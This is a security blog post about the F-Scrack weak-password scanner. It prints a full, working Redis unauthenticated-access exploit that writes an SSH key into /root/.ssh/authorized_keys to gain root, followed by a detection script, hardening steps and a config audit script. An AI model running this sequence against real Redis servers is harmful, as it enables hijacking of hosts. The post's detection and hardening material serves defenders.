Alibaba Security recently published an article introducing a weak-password detection tool, F-Scrack.

Its selling point is that it is a single Python file: run it with Python and it works on any platform without further setup.

Git repository: https://github.com/ysrc/F-Scrack

Scanning the *** internal network environment directly with it is fast.

Below is a test of the Redis privilege-escalation vulnerability:

root [~] ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /tmp/redis_login_key
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /tmp/redis_login_key.
Your public key has been saved in /tmp/redis_login_key.pub.
The key fingerprint is:
ec:86:f0:86:0b:b9:53:1f:6b:ae:a1:9a:63:97:03:50 root@CentOS-74
The key's randomart image is:
+--[ RSA 2048]----+
|                 |
|  E              |
| .               |
|.      .         |
|.   .   S        |
| . ..+.o         |
|  +.+.+oo        |
|.o.B ++.         |
|+o+.++.          |
+-----------------+

root [~] (echo -e "\n\n"; cat ./redis_login_key.pub; echo -e "\n\n") > foo.txt
[root@CentOS-74 hack]# cat foo.txt | redis-cli -h 192.168.0.35 -x set crackit
OK
[root@CentOS-74 hack]# redis-cli -h 192.168.0.35
192.168.0.35:6379> config set dir /root/.ssh/
OK
192.168.0.35:6379> config get dir
1) "dir"
2) "/root/.ssh"
192.168.0.35:6379> config set dbfilename "authorized_keys"
OK
192.168.0.35:6379> save
OK
192.168.0.35:6379> quit
[root@CentOS-74 hack]# ssh -i redis_login_key root@192.168.0.35
The authenticity of host '192.168.0.35 (192.168.0.35)' can't be established.
RSA key fingerprint is 00:23:a9:ff:02:2b:cd:5f:f0:5e:7e:7e:ad:68:9d:a2.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.0.35' (RSA) to the list of known hosts.
Last login: Wed Nov 16 16:01:58 2016 from 192.168.17.113
[root@CentOS14 ~]# whoami
root
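The session above leaves a very recognisable trace on the server side: a single client issues CONFIG SET dir, CONFIG SET dbfilename and then SAVE. The following shell script is an added example, not part of the original post, that runs that detection logic over the output format of `redis-cli MONITOR`. The sample MONITOR lines are constructed (timestamps, client ports and the 10.0.0.7 client are made up; the command sequence mirrors the session above), and the function name `detect_rdb_rewrite` is my own.

```shell
#!/bin/sh
# Added example, not part of the original post: detection logic for the
# CONFIG SET dir / CONFIG SET dbfilename / SAVE sequence shown above, run
# over the output format of `redis-cli MONITOR`.

# Constructed sample of MONITOR output. Timestamps, client ports and the
# 10.0.0.7 client are made up; the command sequence mirrors the session above.
SAMPLE_MONITOR='1479283318.100000 [0 192.168.17.113:51234] "set" "crackit" "\n\n\nssh-rsa PLACEHOLDER_PUBLIC_KEY\n\n\n"
1479283320.200000 [0 192.168.17.113:51240] "config" "set" "dir" "/root/.ssh/"
1479283321.300000 [0 192.168.17.113:51240] "config" "get" "dir"
1479283322.400000 [0 192.168.17.113:51240] "config" "set" "dbfilename" "authorized_keys"
1479283323.500000 [0 192.168.17.113:51240] "save"
1479283330.600000 [0 10.0.0.7:40010] "get" "session:42"
1479283331.700000 [0 10.0.0.7:40010] "config" "get" "maxmemory"
1479283332.800000 [0 10.0.0.7:40010] "bgsave"'

# detect_rdb_rewrite: read MONITOR lines on stdin and print one line per client
# that changed dir or dbfilename and then forced a dump with SAVE/BGSAVE.
# CONFIG GET and dumps that follow no CONFIG SET are ignored.
detect_rdb_rewrite() {
    awk '
    {
        client = $3; sub(/\]$/, "", client)   # "[0 ip:port]" -> ip:port
        line = tolower($0)                     # Redis commands are case-insensitive
        val = $7; gsub(/"/, "", val)           # value field of a 4-word command
    }
    line ~ /"config" "set" "dir" /        { dir[client] = val }
    line ~ /"config" "set" "dbfilename" / { dbf[client] = val }
    line ~ /\] "(save|bgsave)"$/ && ((client in dir) || (client in dbf)) {
        d = (client in dir) ? dir[client] : "unchanged"
        f = (client in dbf) ? dbf[client] : "unchanged"
        printf "%s dir=%s dbfilename=%s\n", client, d, f
        delete dir[client]; delete dbf[client]
    }'
}

# Usage: pipe a MONITOR capture in; here the constructed sample.
printf '%s\n' "$SAMPLE_MONITOR" | detect_rdb_rewrite
```

On the sample this prints `192.168.17.113:51240 dir=/root/.ssh/ dbfilename=authorized_keys` and nothing for the 10.0.0.7 client. MONITOR is costly on a busy instance, so in practice the same matching is better applied to a short capture or to whatever proxy or audit log sits in front of Redis. A legitimate administrator can also change dir and dbfilename, so treat a hit as an alert to triage, with a dump directory under a home directory's .ssh or a dbfilename like authorized_keys as the clear-cut case.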

Recommended fixes

1. Bind the Redis service to a specific network interface (requires a Redis restart to take effect)
In redis.conf, find the line "# bind 127.0.0.1", remove the leading # and save the file. Note: after this change only the local host can reach Redis.

2. Set an access password (requires a Redis restart to take effect)
In redis.conf, find the "requirepass" directive and set it to the password you want; Redis clients must then supply this password to access the Redis service.

3. Change the account the Redis service runs as (requires a Redis restart to take effect)
Run the Redis service under a low-privilege account and disable that account's login. This limits an attacker's ability to write files into sensitive locations, but the Redis data itself can still be read by an attacker, or maliciously deleted.
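The two redis.conf changes above are easy to forget after a package upgrade or a copied config, so they are worth checking mechanically. The script below is an added example, not from the original post, that audits a redis.conf for recommendations 1 and 2 and, going one step beyond the post, for whether the CONFIG command has been renamed away with `rename-command` (the command the session above depends on). Recommendation 3 (the service account) lives in the service unit rather than in redis.conf, so it is not checked here. The two sample configs are constructed, and the function names `write_sample_confs` and `audit_redis_conf` are my own.

```shell
#!/bin/sh
# Added example, not part of the original post: audit a redis.conf for the
# post's first two recommendations (bind, requirepass) and, beyond the post,
# for whether CONFIG has been renamed away with rename-command. The third
# recommendation (service account) lives in the service unit, not in
# redis.conf, so it is not checked here.

# Writes two constructed configs into $1: weak.conf (the defaults the session
# above relied on) and hardened.conf (the recommendations applied).
write_sample_confs() {
    cat > "$1/weak.conf" <<'EOF'
# bind 127.0.0.1
port 6379
# requirepass foobared
dir /var/lib/redis
EOF
    cat > "$1/hardened.conf" <<'EOF'
bind 127.0.0.1
port 6379
requirepass REPLACE_WITH_A_LONG_RANDOM_PASSWORD
dir /var/lib/redis
rename-command CONFIG ""
EOF
}

# audit_redis_conf FILE: print one line per finding and return the number of
# findings as the exit status (0 means every check passed).
audit_redis_conf() {
    findings=0
    # Effective directives only: drop comment lines and blank lines.
    active=$(grep -v '^[[:space:]]*#' "$1" | grep -v '^[[:space:]]*$')

    # 1. bind: missing, 0.0.0.0 or * means every interface is listened on.
    bind_line=$(printf '%s\n' "$active" | grep -E '^[[:space:]]*bind[[:space:]]+' | tail -n 1)
    case "$bind_line" in
        "")             echo "bind: not set, Redis listens on all interfaces"; findings=$((findings + 1)) ;;
        *0.0.0.0*|*\**) echo "bind: '$bind_line' still listens on all interfaces"; findings=$((findings + 1)) ;;
    esac

    # 2. requirepass: missing or empty means unauthenticated access.
    if ! printf '%s\n' "$active" | grep -Eq '^[[:space:]]*requirepass[[:space:]]+[^[:space:]]+'; then
        echo "requirepass: not set, no password is required"
        findings=$((findings + 1))
    fi

    # 3. (not in the post) rename-command CONFIG "" removes the command the
    #    session above depends on; report if it is still reachable by name.
    if ! printf '%s\n' "$active" | grep -Eiq '^[[:space:]]*rename-command[[:space:]]+config[[:space:]]+'; then
        echo "rename-command: CONFIG is still exposed under its default name"
        findings=$((findings + 1))
    fi
    return "$findings"
}

# Usage on the constructed samples.
demo_dir=$(mktemp -d)
write_sample_confs "$demo_dir"
for name in weak hardened; do
    echo "== $name.conf =="
    audit_redis_conf "$demo_dir/$name.conf" && echo "no findings" || echo "$? finding(s)"
done
rm -rf "$demo_dir"
```

The weak config yields three findings and the hardened one none. Two caveats when using this against real instances: a requirepass that is present but short is still what F-Scrack-style tools are built to guess, so the check only tells you a password exists, not that it is strong; and because every change in the post needs a restart, compare the audited file against the running instance rather than assuming the file is what the daemon loaded.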